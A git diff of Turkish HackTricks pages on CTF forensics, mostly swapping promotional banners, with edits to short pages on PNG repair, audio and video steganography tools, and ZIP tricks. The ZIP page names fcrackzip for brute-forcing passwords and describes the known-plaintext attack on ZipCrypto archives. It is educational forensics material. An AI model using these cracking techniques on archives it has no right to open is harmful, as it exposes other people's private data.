* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin**.
* **HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek hacking püf noktalarını paylaşın.
</details>
{% endhint %}

View file

@ -1,19 +1,20 @@
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter'da** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud** github depolarına PR göndererek paylaşın.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
Belirli dosya türleri ve/veya yazılımlar için ilginç püf noktalarını burada bulabilirsiniz:
İşte belirli dosya türleri ve/veya yazılımlar için ilginç püf noktalarını bulabileceğiniz yerler:
{% page-ref page=".pyc.md" %}
@ -37,16 +38,17 @@ Belirli dosya türleri ve/veya yazılımlar için ilginç püf noktalarını bur
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter'da** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud** github depolarına PR göndererek paylaşın.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}

View file

@ -1,17 +1,17 @@
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na (https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
Bir kötü amaçlı VBS dosyasını hata ayıklamak/deobfuscate etmek için faydalı olabilecek bazı şeyler:
@ -52,16 +52,17 @@ End With
End Function
```
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hacklemeyi öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}

View file

@ -1,19 +1,20 @@
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud** github depolarına PR'lar göndererek paylaşın.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
**PNG dosyaları**, **kayıpsız sıkıştırma**ları nedeniyle **CTF zorlukları** için oldukça değerlidir, gizli verilerin gömülmesi için idealdir. **Wireshark** gibi araçlar, PNG dosyalarının ağ paketleri içindeki verilerini analiz ederek gömülü bilgileri veya anormallikleri ortaya çıkarabilir.
**PNG dosyaları**, **kayıpsız sıkıştırma** özellikleri nedeniyle **CTF zorlukları** için oldukça değerlidir, gizli verilerin gömülmesi için idealdir. **Wireshark** gibi araçlar, PNG dosyalarının verilerini ağ paketleri içinde analiz ederek gömülü bilgileri veya anormallikleri ortaya çıkarabilir.
PNG dosyası bütünlüğünü kontrol etmek ve bozulmayı onarmak için **pngcheck** önemli bir araçtır, PNG dosyalarını doğrulamak ve teşhis etmek için komut satırı işlevselliği sunar ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). Dosyalar basit düzeltmelerin ötesinde olduğunda, [OfficeRecovery'nin PixRecovery](https://online.officerecovery.com/pixrecovery/) gibi çevrimiçi hizmetler, **bozuk PNG'leri onarma** konusunda web tabanlı bir çözüm sunar, CTF katılımcıları için önemli verilerin kurtarılmasına yardımcı olur.
PNG dosyası bütünlüğünü kontrol etmek ve bozulmayı onarmak için **pngcheck** önemli bir araçtır, PNG dosyalarını doğrulamak ve teşhis etmek için komut satırı işlevselliği sunar ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). Dosyalar basit düzeltmelerin ötesindeyse, [OfficeRecovery'nin PixRecovery](https://online.officerecovery.com/pixrecovery/) gibi çevrimiçi hizmetler, **bozuk PNG'leri onarma** konusunda web tabanlı bir çözüm sunar ve CTF katılımcıları için önemli verilerin kurtarılmasına yardımcı olur.
Bu stratejiler, CTF'lerde kapsamlı bir yaklaşımın önemini vurgular, gizli veya kayıp verileri ortaya çıkarmak ve kurtarmak için analitik araçlar ve onarım tekniklerinin bir karışımını kullanır.

View file

@ -1,41 +1,41 @@
{% hint style="success" %}
AWS Hacking'ı öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklam görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR gönderin.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* Hacking püf noktalarını paylaşarak PR'ler göndererek **HackTricks** ve **HackTricks Cloud** github depolarına katkıda bulunun.
</details>
{% endhint %}
**Ses ve video dosyası manipülasyonu**, gizli mesajları gizlemek veya ortaya çıkarmak için **steganografi** ve metadata analizini kullanan **CTF adli bilişim zorluklarında** temel bir konudur. **[mediainfo](https://mediaarea.net/en/MediaInfo)** ve **`exiftool`** gibi araçlar, dosya metadata'sını incelemek ve içerik türlerini belirlemek için gereklidir.
**Ses ve video dosyası manipülasyonu**, gizli mesajları gizlemek veya ortaya çıkarmak için **steganografi** ve meta veri analizini kullanan **CTF adli bilişim zorlukları** için temel bir unsurdur. Dosya meta verilerini incelemek ve içerik türlerini belirlemek için **[mediainfo](https://mediaarea.net/en/MediaInfo)** ve **`exiftool`** gibi araçlar vazgeçilmezdir.
Ses zorlukları için **[Audacity](http://www.audacityteam.org/)**, ses içine kodlanmış metinleri ortaya çıkarmak için temel olan dalga formlarını görüntüleme ve spektrogramları analiz etme konusunda öne çıkar. Detaylı spektrogram analizi için **[Sonic Visualiser](http://www.sonicvisualiser.org/)** şiddetle tavsiye edilir. **Audacity**, gizli mesajları tespit etmek için parçaları yavaşlatma veya tersine çevirme gibi ses manipülasyonlarına izin verir. Ses dosyalarını dönüştürme ve düzenleme konusunda üstün olan bir komut satırı yardımcı programı olan **[Sox](http://sox.sourceforge.net/)**.
Ses zorlukları için **[Audacity](http://www.audacityteam.org/)**, ses dosyalarında kodlanmış metinleri ortaya çıkarmak için temel olan dalga formlarını görüntüleme ve spektrogram analizi yapma konusunda öne çıkar. Detaylı spektrogram analizi için **[Sonic Visualiser](http://www.sonicvisualiser.org/)** şiddetle tavsiye edilir. **Audacity**, gizli mesajları tespit etmek için parçaları yavaşlatma veya tersine çevirme gibi ses manipülasyonuna olanak tanır. Ses dosyalarını dönüştürme ve düzenleme konusunda üstün olan bir komut satırı aracı olan **[Sox](http://sox.sourceforge.net/)** bulunmaktadır.
**En Az Anlamlı Bitler (LSB)** manipülasyonu, ses ve video steganografisinde yaygın bir tekniktir ve verileri gizlice gömmek için medya dosyalarının sabit boyutlu parçalarını kullanır. **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)**, **DTMF tonları** veya **Morse kodu** olarak gizlenmiş mesajları çözmek için kullanışlıdır.
Video zorlukları genellikle ses ve video akışlarını bir araya getiren konteyner formatlarını içerir. Bu formatları analiz etmek ve manipüle etmek için **[FFmpeg](http://ffmpeg.org/)** tercih edilen araçtır ve içeriği çözümlemek ve oynatmak için uygundur. Geliştiriciler için **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)**, FFmpeg'in yeteneklerini Python'a entegre ederek gelişmiş betiksel etkileşimler sağlar.
Bu araçlar yelpazesi, CTF zorluklarında gereken esnekliği vurgular, katılımcıların ses ve video dosyaları içindeki gizli verileri ortaya çıkarmak için geniş bir analiz ve manipülasyon teknikleri yelpazesi kullanmaları gerekmektedir.
Bu araçlar yelpazesi, CTF zorluklarında gereken çok yönlülüğü vurgular, katılımcıların ses ve video dosyaları içindeki gizli verileri ortaya çıkarmak için geniş bir analiz ve manipülasyon teknikleri yelpazesi kullanmaları gerekmektedir.
## Referanslar
* [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
{% hint style="success" %}
AWS Hacking'ı öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklam görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR gönderin.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* Hacking püf noktalarını paylaşarak PR'ler göndererek **HackTricks** ve **HackTricks Cloud** github depolarına katkıda bulunun.
</details>
{% endhint %}

View file

@ -1,30 +1,46 @@
# ZIPs hileleri
# ZIP hileleri
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitimi AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitimi GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking hilelerinizi göndererek HackTricks ve HackTricks Cloud** github depolarına PR göndererek paylaşın.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* Hacking püf noktalarını paylaşarak PR'ler göndererek **HackTricks** ve **HackTricks Cloud** github depolarına katkıda bulunun.
</details>
{% endhint %}
**Komut satırı araçları** zip dosyalarını yönetmek için gereklidir, zip dosyalarını teşhis etmek, onarmak ve kırmak için kullanılır. İşte bazı temel yardımcı programlar:
**Komut satırı araçları** zip dosyalarını yönetmek için gereklidir ve zip dosyalarını teşhis etmek, onarmak ve kırmak için kullanılır. İşte bazı temel yardımcı programlar:
- **`unzip`**: Bir zip dosyasının neden açılmayabileceğini ortaya çıkarır.
- **`unzip`**: Bir zip dosyasının neden açılmadığını ortaya çıkarır.
- **`zipdetails -v`**: Zip dosyası biçim alanlarının detaylı analizini sunar.
- **`zipinfo`**: İçerikleri çıkarmadan bir zip dosyasının içeriğini listeler.
- **`zip -F input.zip --out output.zip`** ve **`zip -FF input.zip --out output.zip`**: Bozuk zip dosyalarını onarmaya çalışır.
- **[fcrackzip](https://github.com/hyc/fcrackzip)**: Zip şifrelerini kaba kuvvet yöntemiyle kırmak için etkili bir araç, genellikle 7 karaktere kadar olan şifreler için etkilidir.
- **`zip -F input.zip --out output.zip`** ve **`zip -FF input.zip --out output.zip`**: Bozuk zip dosyalarını onarmayı deneyin.
- **[fcrackzip](https://github.com/hyc/fcrackzip)**: Zip şifrelerini kaba kuvvet yöntemiyle kırmak için etkili olan, yaklaşık 7 karaktere kadar şifreler için etkili bir araç.
[Zip dosya biçimi belirtimi](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT), zip dosyalarının yapısı ve standartları hakkında kapsamlı bilgiler sunar.
[Zip dosya biçimi belirtimi](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT), zip dosyalarının yapısı ve standartları hakkında kapsamlı bilgiler sağlar.
Önemli bir not olarak, şifre korumalı zip dosyalarının **dosya adlarını veya dosya boyutlarını şifrelemediğini** unutmamak önemlidir, bu bilgiyi şifreleyen RAR veya 7z dosyalarıyla paylaşmayan bir güvenlik açığıdır. Ayrıca, eski ZipCrypto yöntemiyle şifrelenmiş zip dosyaları, sıkıştırılmış bir dosyanın şifresiz bir kopyası mevcutsa **düz metin saldırısına**ıktır. Bu saldırı, zip dosyasının şifresini kırmak için bilinen içeriği kullanır, bu zayıflık [HackThis'in makalesinde](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) detaylı olarak açıklanmış ve [bu akademik makalede](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf) daha fazla açıklanmıştır. Bununla birlikte, **AES-256** şifreleme ile korunan zip dosyaları, bu düz metin saldırısına karşı bağışıktır, hassas veriler için güvenli şifreleme yöntemlerini seçmenin önemini gösterir.
Önemli bir not olarak, şifre korumalı zip dosyalarının içindeki dosya adlarını veya dosya boyutlarını **şifrelemediğini** unutmamak önemlidir; bu, RAR veya 7z dosyalarıyla paylaşılmayan bir güvenlik açığıdır, çünkü bu bilgileri şifreler. Ayrıca, eski ZipCrypto yöntemiyle şifrelenmiş zip dosyaları, sıkıştırılmış bir dosyanın şifresiz bir kopyası mevcutsa **düz metin saldırısına**ıktır. Bu saldırı, zip dosyasının şifresini kırmak için bilinen içeriği kullanır; bu zayıflık [HackThis'in makalesinde](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) detaylı olarak açıklanmış ve [bu akademik makalede](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf) daha fazla açıklanmıştır. Bununla birlikte, **AES-256** şifreleme ile korunan zip dosyaları, bu düz metin saldırısına karşı bağışıktır ve hassas veriler için güvenli şifreleme yöntemlerini seçmenin önemini gösterir.
## Referanslar
* [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/)
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitimi AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitimi GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>HackTricks'i Destekleyin</summary>
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* Hacking püf noktalarını paylaşarak PR'ler göndererek **HackTricks** ve **HackTricks Cloud** github depolarına katkıda bulunun.
</details>
{% endhint %}

View file

@ -2,23 +2,23 @@
### İlginç Windows Kayıt Defteri Anahtarları
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahraman olmaya kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
